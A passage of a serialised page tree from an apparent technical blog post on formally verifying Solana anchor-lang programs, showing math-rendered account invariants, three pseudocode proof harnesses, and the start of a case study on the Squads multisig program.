sign",{"type":27,"tag":28,"props":28741,"children":28743},{"id":28742},"verification-how-do-we-check-that-our-model-is-correct",[28744],{"type":33,"value":28745},"Verification: How do we check that our model is correct?",{"type":27,"tag":36,"props":28747,"children":28748},{},[28749,28751,28755,28757,28762],{"type":33,"value":28750},"Now that we have defined the specific instruction and account invariants, we need to generate ",{"type":27,"tag":942,"props":28752,"children":28753},{},[28754],{"type":33,"value":27240},{"type":33,"value":28756}," on which we can run bounded model checking. Our tool does this ",{"type":27,"tag":942,"props":28758,"children":28759},{},[28760],{"type":33,"value":28761},"automagically",{"type":33,"value":28763}," for anchor-lang programs.",{"type":27,"tag":36,"props":28765,"children":28766},{},[28767,28769,28775,28777,28782,28784,28789,28790,28795,28797,28802,28804,28809,28810,28816,28818,28824,28825,28831],{"type":33,"value":28768},"Specifically, for a given ",{"type":27,"tag":84,"props":28770,"children":28772},{"className":28771},[],[28773],{"type":33,"value":28774},"Context\u003CT>",{"type":33,"value":28776}," with ",{"type":27,"tag":942,"props":28778,"children":28779},{},[28780],{"type":33,"value":28781},"incoming",{"type":33,"value":28783}," accounts of types (",{"type":27,"tag":84,"props":28785,"children":28787},{"className":28786},[],[28788],{"type":33,"value":28012},{"type":33,"value":980},{"type":27,"tag":84,"props":28791,"children":28793},{"className":28792},[],[28794],{"type":33,"value":11009},{"type":33,"value":28796},") and ",{"type":27,"tag":942,"props":28798,"children":28799},{},[28800],{"type":33,"value":28801},"outgoing",{"type":33,"value":28803}," accounts of type (",{"type":27,"tag":84,"props":28805,"children":28807},{"className":28806},[],[28808],{"type":33,"value":11009},{"type":33,"value":980},{"type":27,"tag":84,"props":28811,"children":28813},{"className":28812},[],[28814],{"type":33,"value":28815},"close",{"type":33,"value":28817},") we define a ",{"type":27,"tag":84,"props":28819,"children":28821},{"className":28820},[],[28822],{"type":33,"value":28823},"pre_condition",{"type":33,"value":1131},{"type":27,"tag":84,"props":28826,"children":28828},{"className":28827},[],[28829],{"type":33,"value":28830},"post_condition",{"type":33,"value":28832}," expression that is a conjunction of all of the incoming and outcoming account invariants:",{"type":27,"tag":36,"props":28834,"children":28835},{},[28836],{"type":27,"tag":84,"props":28837,"children":28839},{"className":28838},[11266,11267],[28840],{"type":27,"tag":207,"props":28841,"children":28843},{"className":28842},[11272],[28844],{"type":27,"tag":207,"props":28845,"children":28847},{"className":28846,"ariaHidden":11278},[11277],[28848,28884],{"type":27,"tag":207,"props":28849,"children":28851},{"className":28850},[11283],[28852,28857,28865,28870,28874,28880],{"type":27,"tag":207,"props":28853,"children":28856},{"className":28854,"style":28855},[11288],"height:0.6833em;",[],{"type":27,"tag":207,"props":28858,"children":28862},{"className":28859,"style":28861},[11294,28860],"mathnormal","margin-right:0.13889em;",[28863],{"type":33,"value":28864},"P",{"type":27,"tag":207,"props":28866,"children":28868},{"className":28867},[11294],[28869],{"type":33,"value":1660},{"type":27,"tag":207,"props":28871,"children":28873},{"className":28872,"style":11470},[11372],[],{"type":27,"tag":207,"props":28875,"children":28877},{"className":28876},[11475],[28878],{"type":33,"value":28879},":=",{"type":27,"tag":207,"props":28881,"children":28883},{"className":28882,"style":11470},[11372],[],{"type":27,"tag":207,"props":28885,"children":28887},{"className":28886},[11283],[28888,28893,29033,29037],{"type":27,"tag":207,"props":28889,"children":28892},{"className":28890,"style":28891},[11288],"height:1.2247em;vertical-align:-0.4747em;",[],{"type":27,"tag":207,"props":28894,"children":28897},{"className":28895},[28896],"mop",[28898,28907],{"type":27,"tag":207,"props":28899,"children":28904},{"className":28900,"style":28903},[28896,28901,28902],"op-symbol","small-op","position:relative;top:0em;",[28905],{"type":33,"value":28906},"⋀",{"type":27,"tag":207,"props":28908,"children":28910},{"className":28909},[11309],[28911],{"type":27,"tag":207,"props":28912,"children":28915},{"className":28913},[11314,28914],"vlist-t2",[28916,29021],{"type":27,"tag":207,"props":28917,"children":28919},{"className":28918},[11319],[28920,29014],{"type":27,"tag":207,"props":28921,"children":28924},{"className":28922,"style":28923},[11324],"height:0.2253em;",[28925],{"type":27,"tag":207,"props":28926,"children":28928},{"style":28927},"top:-2.4003em;margin-left:0em;margin-right:0.05em;",[28929,28933],{"type":27,"tag":207,"props":28930,"children":28932},{"className":28931,"style":11334},[11333],[],{"type":27,"tag":207,"props":28934,"children":28936},{"className":28935},[11339,11340,11341,11342],[28937],{"type":27,"tag":207,"props":28938,"children":28940},{"className":28939},[11294,11342],[28941,28946,28952,28962,28968,28977,28986,28992,28997,29003,29008],{"type":27,"tag":207,"props":28942,"children":28944},{"className":28943},[11294,28860,11342],[28945],{"type":33,"value":47},{"type":27,"tag":207,"props":28947,"children":28949},{"className":28948},[11294,28860,11342],[28950],{"type":33,"value":28951},"cc",{"type":27,"tag":207,"props":28953,"children":28955},{"className":28954},[11372,11342],[28956],{"type":27,"tag":207,"props":28957,"children":28959},{"className":28958},[11342],[28960],{"type":33,"value":28961}," ",{"type":27,"tag":207,"props":28963,"children":28965},{"className":28964},[11475,11342],[28966],{"type":33,"value":28967},"∈",{"type":27,"tag":207,"props":28969,"children":28971},{"className":28970},[11372,11342],[28972],{"type":27,"tag":207,"props":28973,"children":28975},{"className":28974},[11342],[28976],{"type":33,"value":28961},{"type":27,"tag":207,"props":28978,"children":28980},{"className":28979},[11294,33,11342],[28981],{"type":27,"tag":207,"props":28982,"children":28984},{"className":28983},[11294,11342],[28985],{"type":33,"value":28781},{"type":27,"tag":207,"props":28987,"children":28990},{"className":28988},[28989,11342],"mopen",[28991],{"type":33,"value":1343},{"type":27,"tag":207,"props":28993,"children":28995},{"className":28994},[11294,28860,11342],[28996],{"type":33,"value":10435},{"type":27,"tag":207,"props":28998,"children":29000},{"className":28999},[11294,28860,11342],[29001],{"type":33,"value":29002},"t",{"type":27,"tag":207,"props":29004,"children":29006},{"className":29005},[11294,28860,11342],[29007],{"type":33,"value":26546},{"type":27,"tag":207,"props":29009,"children":29012},{"className":29010},[29011,11342],"mclose",[29013],{"type":33,"value":10416},{"type":27,"tag":207,"props":29015,"children":29018},{"className":29016},[29017],"vlist-s",[29019],{"type":33,"value":29020},"​",{"type":27,"tag":207,"props":29022,"children":29024},{"className":29023},[11319],[29025],{"type":27,"tag":207,"props":29026,"children":29029},{"className":29027,"style":29028},[11324],"height:0.4747em;",[29030],{"type":27,"tag":207,"props":29031,"children":29032},{},[],{"type":27,"tag":207,"props":29034,"children":29036},{"className":29035,"style":11411},[11372],[],{"type":27,"tag":207,"props":29038,"children":29040},{"className":29039},[11294],[29041,29051,29056,29061,29066],{"type":27,"tag":207,"props":29042,"children":29044},{"className":29043},[11294,33],[29045],{"type":27,"tag":207,"props":29046,"children":29048},{"className":29047},[11294],[29049],{"type":33,"value":29050},"invariant",{"type":27,"tag":207,"props":29052,"children":29054},{"className":29053},[28989],[29055],{"type":33,"value":1343},{"type":27,"tag":207,"props":29057,"children":29059},{"className":29058},[11294,28860],[29060],{"type":33,"value":47},{"type":27,"tag":207,"props":29062,"children":29064},{"className":29063},[11294,28860],[29065],{"type":33,"value":28951},{"type":27,"tag":207,"props":29067,"children":29069},{"className":29068},[29011],[29070],{"type":33,"value":10416},{"type":27,"tag":36,"props":29072,"children":29073},{},[29074],{"type":27,"tag":84,"props":29075,"children":29077},{"className":29076},[11266,11267],[29078],{"type":27,"tag":207,"props":29079,"children":29081},{"className":29080},[11272],[29082],{"type":27,"tag":207,"props":29083,"children":29085},{"className":29084,"ariaHidden":11278},[11277],[29086,29117],{"type":27,"tag":207,"props":29087,"children":29089},{"className":29088},[11283],[29090,29094,29099,29104,29108,29113],{"type":27,"tag":207,"props":29091,"children":29093},{"className":29092,"style":28855},[11288],[],{"type":27,"tag":207,"props":29095,"children":29097},{"className":29096,"style":28861},[11294,28860],[29098],{"type":33,"value":28864},{"type":27,"tag":207,"props":29100,"children":29102},{"className":29101},[11294],[29103],{"type":33,"value":1651},{"type":27,"tag":207,"props":29105,"children":29107},{"className":29106,"style":11470},[11372],[],{"type":27,"tag":207,"props":29109,"children":29111},{"className":29110},[11475],[29112],{"type":33,"value":28879},{"type":27,"tag":207,"props":29114,"children":29116},{"className":29115,"style":11470},[11372],[],{"type":27,"tag":207,"props":29118,"children":29120},{"className":29119},[11283],[29121,29125,29248,29252],{"type":27,"tag":207,"props":29122,"children":29124},{"className":29123,"style":28891},[11288],[],{"type":27,"tag":207,"props":29126,"children":29128},{"className":29127},[28896],[29129,29134],{"type":27,"tag":207,"props":29130,"children":29132},{"className":29131,"style":28903},[28896,28901,28902],[29133],{"type":33,"value":28906},{"type":27,"tag":207,"props":29135,"children":29137},{"className":29136},[11309],[29138],{"type":27,"tag":207,"props":29139,"children":29141},{"className":29140},[11314,28914],[29142,29237],{"type":27,"tag":207,"props":29143,"children":29145},{"className":29144},[11319],[29146,29232],{"type":27,"tag":207,"props":29147,"children":29149},{"className":29148,"style":28923},[11324],[29150],{"type":27,"tag":207,"props":29151,"children":29152},{"style":28927},[29153,29157],{"type":27,"tag":207,"props":29154,"children":29156},{"className":29155,"style":11334},[11333],[],{"type":27,"tag":207,"props":29158,"children":29160},{"className":29159},[11339,11340,11341,11342],[29161],{"type":27,"tag":207,"props":29162,"children":29164},{"className":29163},[11294,11342],[29165,29170,29175,29184,29189,29198,29207,29212,29217,29222,29227],{"type":27,"tag":207,"props":29166,"children":29168},{"className":29167},[11294,28860,11342],[29169],{"type":33,"value":47},{"type":27,"tag":207,"props":29171,"children":29173},{"className":29172},[11294,28860,11342],[29174],{"type":33,"value":28951},{"type":27,"tag":207,"props":29176,"children":29178},{"className":29177},[11372,11342],[29179],{"type":27,"tag":207,"props":29180,"children":29182},{"className":29181},[11342],[29183],{"type":33,"value":28961},{"type":27,"tag":207,"props":29185,"children":29187},{"className":29186},[11475,11342],[29188],{"type":33,"value":28967},{"type":27,"tag":207,"props":29190,"children":29192},{"className":29191},[11372,11342],[29193],{"type":27,"tag":207,"props":29194,"children":29196},{"className":29195},[11342],[29197],{"type":33,"value":28961},{"type":27,"tag":207,"props":29199,"children":29201},{"className":29200},[11294,33,11342],[29202],{"type":27,"tag":207,"props":29203,"children":29205},{"className":29204},[11294,11342],[29206],{"type":33,"value":28801},{"type":27,"tag":207,"props":29208,"children":29210},{"className":29209},[28989,11342],[29211],{"type":33,"value":1343},{"type":27,"tag":207,"props":29213,"children":29215},{"className":29214},[11294,28860,11342],[29216],{"type":33,"value":10435},{"type":27,"tag":207,"props":29218,"children":29220},{"className":29219},[11294,28860,11342],[29221],{"type":33,"value":29002},{"type":27,"tag":207,"props":29223,"children":29225},{"className":29224},[11294,28860,11342],[29226],{"type":33,"value":26546},{"type":27,"tag":207,"props":29228,"children":29230},{"className":29229},[29011,11342],[29231],{"type":33,"value":10416},{"type":27,"tag":207,"props":29233,"children":29235},{"className":29234},[29017],[29236],{"type":33,"value":29020},{"type":27,"tag":207,"props":29238,"children":29240},{"className":29239},[11319],[29241],{"type":27,"tag":207,"props":29242,"children":29244},{"className":29243,"style":29028},[11324],[29245],{"type":27,"tag":207,"props":29246,"children":29247},{},[],{"type":27,"tag":207,"props":29249,"children":29251},{"className":29250,"style":11411},[11372],[],{"type":27,"tag":207,"props":29253,"children":29255},{"className":29254},[11294],[29256,29265,29270,29275,29280],{"type":27,"tag":207,"props":29257,"children":29259},{"className":29258},[11294,33],[29260],{"type":27,"tag":207,"props":29261,"children":29263},{"className":29262},[11294],[29264],{"type":33,"value":29050},{"type":27,"tag":207,"props":29266,"children":29268},{"className":29267},[28989],[29269],{"type":33,"value":1343},{"type":27,"tag":207,"props":29271,"children":29273},{"className":29272},[11294,28860],[29274],{"type":33,"value":47},{"type":27,"tag":207,"props":29276,"children":29278},{"className":29277},[11294,28860],[29279],{"type":33,"value":28951},{"type":27,"tag":207,"props":29281,"children":29283},{"className":29282},[29011],[29284],{"type":33,"value":10416},{"type":27,"tag":36,"props":29286,"children":29287},{},[29288],{"type":33,"value":29289},"Our instruction invariants are represented as:",{"type":27,"tag":1228,"props":29291,"children":29292},{},[29293,29329],{"type":27,"tag":1232,"props":29294,"children":29295},{},[29296,29323,29324],{"type":27,"tag":84,"props":29297,"children":29299},{"className":29298},[11266,11267],[29300],{"type":27,"tag":207,"props":29301,"children":29303},{"className":29302},[11272],[29304],{"type":27,"tag":207,"props":29305,"children":29307},{"className":29306,"ariaHidden":11278},[11277],[29308],{"type":27,"tag":207,"props":29309,"children":29311},{"className":29310},[11283],[29312,29316],{"type":27,"tag":207,"props":29313,"children":29315},{"className":29314,"style":28855},[11288],[],{"type":27,"tag":207,"props":29317,"children":29320},{"className":29318,"style":29319},[11294,28860],"margin-right:0.05764em;",[29321],{"type":33,"value":29322},"S",{"type":33,"value":22606},{"type":27,"tag":84,"props":29325,"children":29327},{"className":29326},[],[29328],{"type":33,"value":27426},{"type":27,"tag":1232,"props":29330,"children":29331},{},[29332,29358,29359],{"type":27,"tag":84,"props":29333,"children":29335},{"className":29334},[11266,11267],[29336],{"type":27,"tag":207,"props":29337,"children":29339},{"className":29338},[11272],[29340],{"type":27,"tag":207,"props":29341,"children":29343},{"className":29342,"ariaHidden":11278},[11277],[29344],{"type":27,"tag":207,"props":29345,"children":29347},{"className":29346},[11283],[29348,29352],{"type":27,"tag":207,"props":29349,"children":29351},{"className":29350,"style":28855},[11288],[],{"type":27,"tag":207,"props":29353,"children":29355},{"className":29354,"style":29319},[11294,28860],[29356],{"type":33,"value":29357},"E",{"type":33,"value":22606},{"type":27,"tag":84,"props":29360,"children":29362},{"className":29361},[],[29363],{"type":33,"value":27433},{"type":27,"tag":36,"props":29365,"children":29366},{},[29367,29369,29396,29398,29403,29405,29411],{"type":33,"value":29368},"And ",{"type":27,"tag":84,"props":29370,"children":29372},{"className":29371},[11266,11267],[29373],{"type":27,"tag":207,"props":29374,"children":29376},{"className":29375},[11272],[29377],{"type":27,"tag":207,"props":29378,"children":29380},{"className":29379,"ariaHidden":11278},[11277],[29381],{"type":27,"tag":207,"props":29382,"children":29384},{"className":29383},[11283],[29385,29389],{"type":27,"tag":207,"props":29386,"children":29388},{"className":29387,"style":28855},[11288],[],{"type":27,"tag":207,"props":29390,"children":29393},{"className":29391,"style":29392},[11294,28860],"margin-right:0.07153em;",[29394],{"type":33,"value":29395},"K",{"type":33,"value":29397}," represents whether the instruction actually succeeds (i.e. invoking the handler returned an ",{"type":27,"tag":84,"props":29399,"children":29401},{"className":29400},[],[29402],{"type":33,"value":27761},{"type":33,"value":29404}," not an ",{"type":27,"tag":84,"props":29406,"children":29408},{"className":29407},[],[29409],{"type":33,"value":29410},"Err",{"type":33,"value":28014},{"type":27,"tag":36,"props":29413,"children":29414},{},[29415],{"type":33,"value":29416},"In order to verify these conditions we need to verify three cases:",{"type":27,"tag":58,"props":29418,"children":29420},{"id":29419},"account-invariants-1",[29421],{"type":33,"value":29422},"Account invariants",{"type":27,"tag":36,"props":29424,"children":29425},{},[29426,29428,29459,29461,29491,29493,29523],{"type":33,"value":29427},"After we execute an instruction, either the function should error and be reverted (",{"type":27,"tag":84,"props":29429,"children":29431},{"className":29430},[11266,11267],[29432],{"type":27,"tag":207,"props":29433,"children":29435},{"className":29434},[11272],[29436],{"type":27,"tag":207,"props":29437,"children":29439},{"className":29438,"ariaHidden":11278},[11277],[29440],{"type":27,"tag":207,"props":29441,"children":29443},{"className":29442},[11283],[29444,29448,29454],{"type":27,"tag":207,"props":29445,"children":29447},{"className":29446,"style":28855},[11288],[],{"type":27,"tag":207,"props":29449,"children":29451},{"className":29450},[11294],[29452],{"type":33,"value":29453},"¬",{"type":27,"tag":207,"props":29455,"children":29457},{"className":29456,"style":29392},[11294,28860],[29458],{"type":33,"value":29395},{"type":33,"value":29460},") or the account post-invariants should hold (",{"type":27,"tag":84,"props":29462,"children":29464},{"className":29463},[11266,11267],[29465],{"type":27,"tag":207,"props":29466,"children":29468},{"className":29467},[11272],[29469],{"type":27,"tag":207,"props":29470,"children":29472},{"className":29471,"ariaHidden":11278},[11277],[29473],{"type":27,"tag":207,"props":29474,"children":29476},{"className":29475},[11283],[29477,29481,29486],{"type":27,"tag":207,"props":29478,"children":29480},{"className":29479,"style":28855},[11288],[],{"type":27,"tag":207,"props":29482,"children":29484},{"className":29483,"style":28861},[11294,28860],[29485],{"type":33,"value":28864},{"type":27,"tag":207,"props":29487,"children":29489},{"className":29488},[11294],[29490],{"type":33,"value":1651},{"type":33,"value":29492},"). Furthermore, we can assume that before executing a function, the account pre-invariants (",{"type":27,"tag":84,"props":29494,"children":29496},{"className":29495},[11266,11267],[29497],{"type":27,"tag":207,"props":29498,"children":29500},{"className":29499},[11272],[29501],{"type":27,"tag":207,"props":29502,"children":29504},{"className":29503,"ariaHidden":11278},[11277],[29505],{"type":27,"tag":207,"props":29506,"children":29508},{"className":29507},[11283],[29509,29513,29518],{"type":27,"tag":207,"props":29510,"children":29512},{"className":29511,"style":28855},[11288],[],{"type":27,"tag":207,"props":29514,"children":29516},{"className":29515,"style":28861},[11294,28860],[29517],{"type":33,"value":28864},{"type":27,"tag":207,"props":29519,"children":29521},{"className":29520},[11294],[29522],{"type":33,"value":1660},{"type":33,"value":29524},") should hold since we will verify all of the functions eventually.",{"type":27,"tag":36,"props":29526,"children":29527},{},[29528,29530],{"type":33,"value":29529},"So we are trying to prove that ",{"type":27,"tag":84,"props":29531,"children":29533},{"className":29532},[11266,11267],[29534],{"type":27,"tag":207,"props":29535,"children":29537},{"className":29536},[11272],[29538],{"type":27,"tag":207,"props":29539,"children":29541},{"className":29540,"ariaHidden":11278},[11277],[29542,29579,29611],{"type":27,"tag":207,"props":29543,"children":29545},{"className":29544},[11283],[29546,29550,29555,29560,29565,29569,29575],{"type":27,"tag":207,"props":29547,"children":29549},{"className":29548,"style":11393},[11288],[],{"type":27,"tag":207,"props":29551,"children":29553},{"className":29552},[28989],[29554],{"type":33,"value":1343},{"type":27,"tag":207,"props":29556,"children":29558},{"className":29557,"style":28861},[11294,28860],[29559],{"type":33,"value":28864},{"type":27,"tag":207,"props":29561,"children":29563},{"className":29562},[11294],[29564],{"type":33,"value":1660},{"type":27,"tag":207,"props":29566,"children":29568},{"className":29567,"style":11373},[11372],[],{"type":27,"tag":207,"props":29570,"children":29572},{"className":29571},[11378],[29573],{"type":33,"value":29574},"∧",{"type":27,"tag":207,"props":29576,"children":29578},{"className":29577,"style":11373},[11372],[],{"type":27,"tag":207,"props":29580,"children":29582},{"className":29581},[11283],[29583,29587,29592,29597,29601,29607],{"type":27,"tag":207,"props":29584,"children":29586},{"className":29585,"style":11393},[11288],[],{"type":27,"tag":207,"props":29588,"children":29590},{"className":29589,"style":29392},[11294,28860],[29591],{"type":33,"value":29395},{"type":27,"tag":207,"props":29593,"children":29595},{"className":29594},[29011],[29596],{"type":33,"value":10416},{"type":27,"tag":207,"props":29598,"children":29600},{"className":29599,"style":11470},[11372],[],{"type":27,"tag":207,"props":29602,"children":29604},{"className":29603},[11475],[29605],{"type":33,"value":29606},"→",{"type":27,"tag":207,"props":29608,"children":29610},{"className":29609,"style":11470},[11372],[],{"type":27,"tag":207,"props":29612,"children":29614},{"className":29613},[11283],[29615,29619,29624],{"type":27,"tag":207,"props":29616,"children":29618},{"className":29617,"style":28855},[11288],[],{"type":27,"tag":207,"props":29620,"children":29622},{"className":29621,"style":28861},[11294,28860],[29623],{"type":33,"value":28864},{"type":27,"tag":207,"props":29625,"children":29627},{"className":29626},[11294],[29628],{"type":33,"value":1651},{"type":27,"tag":36,"props":29630,"children":29631},{},[29632],{"type":33,"value":29633},"We can construct a proof harness like the following:",{"type":27,"tag":101,"props":29635,"children":29637},{"code":29636,"language":26731,"meta":7,"className":26732,"style":7},"assume(P0)\nres = instruction_handler(...)\nassert(!K || P1)\n",[29638],{"type":27,"tag":84,"props":29639,"children":29640},{"__ignoreMap":7},[29641,29649,29666],{"type":27,"tag":207,"props":29642,"children":29643},{"class":209,"line":210},[29644],{"type":27,"tag":207,"props":29645,"children":29646},{"style":238},[29647],{"type":33,"value":29648},"assume(P0)\n",{"type":27,"tag":207,"props":29650,"children":29651},{"class":209,"line":244},[29652,29657,29661],{"type":27,"tag":207,"props":29653,"children":29654},{"style":238},[29655],{"type":33,"value":29656},"res ",{"type":27,"tag":207,"props":29658,"children":29659},{"style":226},[29660],{"type":33,"value":10380},{"type":27,"tag":207,"props":29662,"children":29663},{"style":238},[29664],{"type":33,"value":29665}," instruction_handler(...)\n",{"type":27,"tag":207,"props":29667,"children":29668},{"class":209,"line":270},[29669,29673,29677,29682,29687,29692],{"type":27,"tag":207,"props":29670,"children":29671},{"style":376},[29672],{"type":33,"value":27255},{"type":27,"tag":207,"props":29674,"children":29675},{"style":238},[29676],{"type":33,"value":1343},{"type":27,"tag":207,"props":29678,"children":29680},{"style":29679},"--shiki-default:#F44747",[29681],{"type":33,"value":27893},{"type":27,"tag":207,"props":29683,"children":29684},{"style":238},[29685],{"type":33,"value":29686},"K ",{"type":27,"tag":207,"props":29688,"children":29689},{"style":29679},[29690],{"type":33,"value":29691},"||",{"type":27,"tag":207,"props":29693,"children":29694},{"style":238},[29695],{"type":33,"value":29696}," P1)\n",{"type":27,"tag":36,"props":29698,"children":29699},{},[29700],{"type":33,"value":29701},"By itself, this harness doesn't actually prove much. For example, if the instruction fails every time, this proof will still work. However, in conjunction with the two subsequent proofs we can be assured that the instruction will actually succeed when we expect it to.",{"type":27,"tag":58,"props":29703,"children":29705},{"id":29704},"positive-instruction-invariant",[29706],{"type":33,"value":29707},"Positive instruction invariant",{"type":27,"tag":36,"props":29709,"children":29710},{},[29711,29713,29719,29721,29772],{"type":33,"value":29712},"Next we need to prove that ",{"type":27,"tag":84,"props":29714,"children":29716},{"className":29715},[],[29717],{"type":33,"value":29718},"success_if",{"type":33,"value":29720}," is a sufficient condition for instruction success. I.e. ",{"type":27,"tag":84,"props":29722,"children":29724},{"className":29723},[11266,11267],[29725],{"type":27,"tag":207,"props":29726,"children":29728},{"className":29727},[11272],[29729],{"type":27,"tag":207,"props":29730,"children":29732},{"className":29731,"ariaHidden":11278},[11277],[29733,29759],{"type":27,"tag":207,"props":29734,"children":29736},{"className":29735},[11283],[29737,29741,29746,29750,29755],{"type":27,"tag":207,"props":29738,"children":29740},{"className":29739,"style":28855},[11288],[],{"type":27,"tag":207,"props":29742,"children":29744},{"className":29743,"style":29319},[11294,28860],[29745],{"type":33,"value":29322},{"type":27,"tag":207,"props":29747,"children":29749},{"className":29748,"style":11470},[11372],[],{"type":27,"tag":207,"props":29751,"children":29753},{"className":29752},[11475],[29754],{"type":33,"value":29606},{"type":27,"tag":207,"props":29756,"children":29758},{"className":29757,"style":11470},[11372],[],{"type":27,"tag":207,"props":29760,"children":29762},{"className":29761},[11283],[29763,29767],{"type":27,"tag":207,"props":29764,"children":29766},{"className":29765,"style":28855},[11288],[],{"type":27,"tag":207,"props":29768,"children":29770},{"className":29769,"style":29392},[11294,28860],[29771],{"type":33,"value":29395},{"type":33,"value":1041},{"type":27,"tag":36,"props":29774,"children":29775},{},[29776],{"type":33,"value":29777},"Just like before we can construct a proof harness:",{"type":27,"tag":101,"props":29779,"children":29781},{"code":29780,"language":26731,"meta":7,"className":26732,"style":7},"assume(S)\nres = instruction_handler(...)\nassert(K)\n",[29782],{"type":27,"tag":84,"props":29783,"children":29784},{"__ignoreMap":7},[29785,29793,29808],{"type":27,"tag":207,"props":29786,"children":29787},{"class":209,"line":210},[29788],{"type":27,"tag":207,"props":29789,"children":29790},{"style":238},[29791],{"type":33,"value":29792},"assume(S)\n",{"type":27,"tag":207,"props":29794,"children":29795},{"class":209,"line":244},[29796,29800,29804],{"type":27,"tag":207,"props":29797,"children":29798},{"style":238},[29799],{"type":33,"value":29656},{"type":27,"tag":207,"props":29801,"children":29802},{"style":226},[29803],{"type":33,"value":10380},{"type":27,"tag":207,"props":29805,"children":29806},{"style":238},[29807],{"type":33,"value":29665},{"type":27,"tag":207,"props":29809,"children":29810},{"class":209,"line":270},[29811,29815],{"type":27,"tag":207,"props":29812,"children":29813},{"style":376},[29814],{"type":33,"value":27255},{"type":27,"tag":207,"props":29816,"children":29817},{"style":238},[29818],{"type":33,"value":29819},"(K)\n",{"type":27,"tag":36,"props":29821,"children":29822},{},[29823,29825,29830,29832,29844],{"type":33,"value":29824},"This proof assures that whenever ",{"type":27,"tag":84,"props":29826,"children":29828},{"className":29827},[],[29829],{"type":33,"value":27426},{"type":33,"value":29831}," is satisfied, the instruction will succeed. However, remember that since this is not a biconditional, the instruction may also succeed ",{"type":27,"tag":942,"props":29833,"children":29834},{},[29835,29837,29842],{"type":33,"value":29836},"even if ",{"type":27,"tag":84,"props":29838,"children":29840},{"className":29839},[],[29841],{"type":33,"value":27426},{"type":33,"value":29843}," is not satisfied",{"type":33,"value":29845},". To specify explicit error conditions we need our third and final proof.",{"type":27,"tag":58,"props":29847,"children":29849},{"id":29848},"_3-negative-instruction-invariant",[29850],{"type":33,"value":29851},"3. Negative instruction invariant",{"type":27,"tag":36,"props":29853,"children":29854},{},[29855,29857,29862,29864,29920],{"type":33,"value":29856},"Finally, we want to prove that ",{"type":27,"tag":84,"props":29858,"children":29860},{"className":29859},[],[29861],{"type":33,"value":27433},{"type":33,"value":29863}," is a sufficient condition for instruction failure. I.e. ",{"type":27,"tag":84,"props":29865,"children":29867},{"className":29866},[11266,11267],[29868],{"type":27,"tag":207,"props":29869,"children":29871},{"className":29870},[11272],[29872],{"type":27,"tag":207,"props":29873,"children":29875},{"className":29874,"ariaHidden":11278},[11277],[29876,29902],{"type":27,"tag":207,"props":29877,"children":29879},{"className":29878},[11283],[29880,29884,29889,29893,29898],{"type":27,"tag":207,"props":29881,"children":29883},{"className":29882,"style":28855},[11288],[],{"type":27,"tag":207,"props":29885,"children":29887},{"className":29886,"style":29319},[11294,28860],[29888],{"type":33,"value":29357},{"type":27,"tag":207,"props":29890,"children":29892},{"className":29891,"style":11470},[11372],[],{"type":27,"tag":207,"props":29894,"children":29896},{"className":29895},[11475],[29897],{"type":33,"value":29606},{"type":27,"tag":207,"props":29899,"children":29901},{"className":29900,"style":11470},[11372],[],{"type":27,"tag":207,"props":29903,"children":29905},{"className":29904},[11283],[29906,29910,29915],{"type":27,"tag":207,"props":29907,"children":29909},{"className":29908,"style":28855},[11288],[],{"type":27,"tag":207,"props":29911,"children":29913},{"className":29912},[11294],[29914],{"type":33,"value":29453},{"type":27,"tag":207,"props":29916,"children":29918},{"className":29917,"style":29392},[11294,28860],[29919],{"type":33,"value":29395},{"type":33,"value":1041},{"type":27,"tag":36,"props":29922,"children":29923},{},[29924],{"type":33,"value":29925},"This harness looks just like the previous one:",{"type":27,"tag":101,"props":29927,"children":29929},{"code":29928,"language":26731,"meta":7,"className":26732,"style":7},"assume(E)\nres = instruction_handler(...)\nassert(!K)\n",[29930],{"type":27,"tag":84,"props":29931,"children":29932},{"__ignoreMap":7},[29933,29941,29956],{"type":27,"tag":207,"props":29934,"children":29935},{"class":209,"line":210},[29936],{"type":27,"tag":207,"props":29937,"children":29938},{"style":238},[29939],{"type":33,"value":29940},"assume(E)\n",{"type":27,"tag":207,"props":29942,"children":29943},{"class":209,"line":244},[29944,29948,29952],{"type":27,"tag":207,"props":29945,"children":29946},{"style":238},[29947],{"type":33,"value":29656},{"type":27,"tag":207,"props":29949,"children":29950},{"style":226},[29951],{"type":33,"value":10380},{"type":27,"tag":207,"props":29953,"children":29954},{"style":238},[29955],{"type":33,"value":29665},{"type":27,"tag":207,"props":29957,"children":29958},{"class":209,"line":270},[29959,29963,29967,29971],{"type":27,"tag":207,"props":29960,"children":29961},{"style":376},[29962],{"type":33,"value":27255},{"type":27,"tag":207,"props":29964,"children":29965},{"style":238},[29966],{"type":33,"value":1343},{"type":27,"tag":207,"props":29968,"children":29969},{"style":29679},[29970],{"type":33,"value":27893},{"type":27,"tag":207,"props":29972,"children":29973},{"style":238},[29974],{"type":33,"value":29975},"K)\n",{"type":27,"tag":36,"props":29977,"children":29978},{},[29979,29981,29985],{"type":33,"value":29980},"With these three harnesses, we are now able to formally verify that instructions succeed or fail when we expect them to ",{"type":27,"tag":942,"props":29982,"children":29983},{},[29984],{"type":33,"value":23647},{"type":33,"value":29986}," the account invariants we expect are always being preserved.",{"type":27,"tag":28,"props":29988,"children":29990},{"id":29989},"case-study-squads-multisig",[29991],{"type":33,"value":29992},"Case study: Squads Multisig",{"type":27,"tag":36,"props":29994,"children":29995},{},[29996,29998,30003],{"type":33,"value":29997},"During our research, we focused on formally verifying aspects of the ",{"type":27,"tag":47,"props":29999,"children":30001},{"href":26094,"rel":30000},[51],[30002],{"type":33,"value":26098},{"type":33,"value":1041},{"type":27,"tag":36,"props":30005,"children":30006},{},[30007,30009,30015,30017,30023],{"type":33,"value":30008},"The program defines a Multisig account (",{"type":27,"tag":84,"props":30010,"children":30012},{"className":30011},[],[30013],{"type":33,"value":30014},"Ms",{"type":33,"value":30016},") which has multiple members. These members can propose and then vote on transactions to execute on behalf of the multisig. If at least some ",{"type":27,"tag":84,"props":30018,"children":30020},{"className":30019},[],[30021],{"type":33,"value":30022},"threshold",{"type":33,"value":30024}," of members vote yes, the transaction will be invoked. Additionally, there is functionality to add/remove users and update the threshold.",{"type":27,"tag":36,"props":30026,"children":30027},{},[30028],{"type":33,"value":30029},"In practice, this structure provides a useful way to distribute authority across a group of individuals. From a formal verification perspective, it has both stateless and stateful features and constraints that provided a good testbed for our tooling.",{"type":27,"tag":36,"props":30031,"children":30032},{},[30033],{"type":33,"value":30034},"In this section we will go through a few examples of properties that we can verify on this program:",{"type":27,"tag":12719,"props":30036,"children":30037},{},[30038,30043,30048,30053],{"type":27,"tag":1232,"props":30039,"children":30040},{},[30041],{"type":33,"value":30042},"Incrementally verifying minimum requirements to create a 